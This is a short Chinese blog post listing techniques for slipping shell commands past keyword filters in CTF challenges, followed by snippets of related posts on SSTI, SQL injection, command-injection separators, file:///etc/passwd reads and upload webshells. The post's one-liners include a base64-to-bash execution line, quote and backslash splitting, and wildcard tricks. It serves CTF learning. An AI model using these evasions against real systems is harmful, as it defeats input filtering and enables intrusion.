【CTF】绕过关键字的方法

于 2024-08-20 08:15:00 发布
阅读量453 收藏 1
点赞数 8
分类专栏: CTF知识点 文章标签: 前端 网络安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/star3119391396/article/details/141288002
版权

前言:在CTF比赛中,常常会遇到一些关键字或者某个词被匹配过滤,就需要用其他的方法进行绕过,在此记录以下。欢迎大佬补充。

反斜杠绕过 ca\t y1n\g.php

两个单引号绕过 cat y1''ng.php

base64编码绕过 echo “base64编码” | base64 -d | bash

hex编码绕过 echo "hex编码" | xxd -r -p | bash

用[ ]进行匹配 cat y1[n]g.php

用*匹配任意 cat y1n*

用?匹配任意 cat y1n?

用{ }匹配范围 cat y1{a..z}g.php

变量 $a=fl;$b=ag;cat $a$b.php

拼接绕过 ‘fl’.'ag'

还有一些比如异或绕过,取反执行,短标签,url编码绕过等等

php沙盒绕过ctf,浅析SSTI(python沙盒绕过)
weixin_39583162的博客
04-09 1084
CTF比赛中见过不少的SSTI题目,在这里整理下思路,记录下0x01 简介SSTI(Server-Side Template Injection),即服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的,目前CTF常见的SSTI题中,大部分是考python的0x02 攻击流程攻击流程,以文件读取为例子函数解析__c...
【红日Day13-CTF】特殊WAF SQL注入绕过
PZ的博客
01-20 1110
练习记录 复现代码: index.php <?php require 'config.php'; function dhtmlspecialchars($string) { if (is_array($string)) { foreach ($string as $key => $val) { $string[$key] ...
php基础学习之可变函数(web渗透测试关键字绕过rce和回调函数)
这个博主不懒,但Ta什么也没写~(私信互关24小时必回)
02-16 808
看可变函数的知识点之前,蒟蒻博主建议你先去看看php的,会更加方便理解,在本篇博客中的第五块知识点->
php应该避开的关键字,PHP屏蔽过滤指定关键字方法
weixin_42466518的博客
04-10 305
搜索热词本文实例讲述了PHP屏蔽过滤指定关键字方法。分享给大家供大家参考。具体分析如下:实现思路:一、把关键字专门写在一个文本文件里,每行一个,数量不限,有多少写多少。二、PHP读取关键字文本,存入一个数组三、遍历关键字数组,挨个用strpos函数去看看内容有没有关键字,如果有,返回true,没有则返回false代码如下:PHP中用strpos函数过滤关键字 */// 关键字过滤函数functi...
CTF命令执行与绕过
Rog's Blog
04-12 1536
浅谈CTF中命令执行与绕过的小技巧 一、空格绕过 1.cat<filename shell 2.cat<>filename shell 3.{cat,filename} shell 4.%09 符号 php 5.cat$IFS$9filename cat${IFS}filename shell 二、命令分隔符号 1.ls /;cat filename shell 2.ls /&cat filename shell 3.ls /|cat filename shell 4.%0a p
CTF之命令执行常见绕过
qq_42383069的博客
04-18 7300
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
ctfhub 综合过滤
L1ni01
09-15 1360
题目考点 命令注入 过滤运算符、过滤目录分隔符、过滤反斜杠、过滤空格、过滤封号、过滤cat、过滤关键字flag和ctfhub 首先我们要使用ls列目录,发现这里过滤了运算符,绕过的方式有%0a、%0d、%0D%0A,经测试这里可以使用%0a 127.0.0.1%0als 空格及关键词过滤绕过 我们使用ls flag_is_here列出子目录的文件,免不了绕过空格和flag的顾虑,绕过空格前面已经有writeup中附带了相关技巧,我们这里使用${IFS}绕过 绕过flag关键字,我们使用的方法也是多种多样,
网络安全CTF竞赛中SQL注入题型解析:常见攻击手法与绕过技巧总结
最新发布
04-20
主要包括无过滤带回显的手工注入、万能密码及其变种、过滤部分字符后的绕过方法、Union联合查询绕过、SQL异或注入以及SQL盲注等六类典型问题。每种类型都配有详细的攻击流程、实际案例和可能用到的工具(如Firefox、...
ctf xss常见绕过方法
01-08
### 常见的CTF XSS绕过技术 #### 绕过HTML实体编码 当服务器端对特殊字符进行了HTML实体编码处理,可以尝试使用不同的编码方式来绕过这种防护机制。例如,对于`和`>`符号被转义的情况,可以通过Unicode编码的方式...
20210218CTF伪协议绕过file_get_contents(bugkuctfweb21御结冰城感想)
热门推荐
qq_45290991的博客
02-18 1万+
CTF中常用的php伪协议利用 </h1> <div class="clear"></div> <div class="postBody"> file://# 作用: 用于访问文件(绝对路径、相对路径、网络路径) 示例: http://www.xx.com?file=file:///etc/passswd ph...
sql注入关键字大全
07-27
sql注入关键字大全,包括sqlserve , odbc,等
浅谈CTF中各种花式绕过的小trick
ph0ebus的博客
02-23 5746
在代码审计的时候,我们不难发现很多很多的函数需要我们bypass,这些知识点很多又很小,基本上是一眼就明白,但是下一次遇见又不太清晰,需要反反复复查找,这篇文章浅浅做个汇总,如有不足,欢迎补充。
常见绕过方法总结
weixin_66839513的博客
03-26 3061
两个空格代替一个空格,用Tab代替空格,%a0=空格。绕过的替代类型:%20 --代表url编码的空格,在空格过滤时可以代替。%09--用于在输出或显示文本时在该位置产生一个固定的水平间距,类似于tab键。%0a--代表换行符%0b--用于在输出或显示文本时在该位置产生一个固定的垂直间距,类似于tab键。%0c--%0d--回车换行%a0--代表的是非断行空格%00--%00代表的是ASCII码中的空字符/**/可以将空格字符替换成注释/**/,也可以使用内联注释,/!code。
CTF-命令注入绕过技巧总结
键盘的起始页
04-10 708
执行顺序:输出base64编码内容------>base64解码其编码内容------>执行bash命令。cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2。注意:反引号``和$()用来表示命令执行,被这两种方式包含的字符串都会被当作命令优先执行。cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2。管道符”|“左边的命令的输出会作为管道符”|“右边命令的输入。核心:利用管道符”|“将左边命令的输入作为右边命令的输出。
ctf题目php文件上传如何绕过_ctf基本的文件上传与绕过学习
weixin_42591413的博客
02-01 3475
绕过客户端校验前台脚本检测扩展名上传webs hell原理:当用户在客户端选择文件点击上传的时候,客户端还没有向服务器发送任何消息,就对本地文件进行检测来判断是否是可以上传的类型,这种方式称为前台脚本检测扩展名。绕过前台脚本检测扩展名,就是将所要上传文件的扩展名更改为符合脚本检测规则的扩展名,通过 BurpSuite 工具,截取数据包,并将数据包中文件扩展名更改回原来的,达到绕过的目的实验:打开要...
CTF 命令执行绕过总结
jnszstmei的博客
06-01 1159
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示。或:rce-xor-or.php & rce-xor-or.py。# ls -t >shell 将输出输入到shell文件中。异或:rce-xor.php & rce-xor.py。%09(url传递)(cat%09flag.php)sh /flag 2>%261 //报错出文件内容。2、1使用空变量$*和$@,$x,${x}绕过。7、异或无符号(过滤0-9a-zA-Z)more:一页一页的显示档案内容
[CTF技巧]命令注入绕过总结
3tefanie丶zhou的博客
07-08 4159
命令分隔符 cat /etc/passwd;ls 分号 ; cmd1;cmd2(多条语句顺序执行) cat /etc/passwd && ls and && cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2 cat etc || ls or || cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2 管道符 | | 管道符 管道符”|“
CTF中遇到cat被过滤情况
wikey 的博客
03-28 335
{cat,flag.php} //用逗号实现了空格功能。$IFS$9 //$9改成 $ 加其他数字貌似都行。php中的cat函数可以提供查询功能,本机的IP是127.0.0.1。以下都可以作为空格过滤。
CTFHub技能树笔记之RCE:命令注入、过滤cat、过滤空格
weixin_48799157的博客
03-28 1万+
小白一个,记录解题过程,如有错误请指正! 一、命令注入 补充知识点: 命令行注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。 Windows系统支持的管道符如下: 1. “|”:直接执行后面的语句。 2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。 3. “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。 4. “&&...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梦 & 醒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值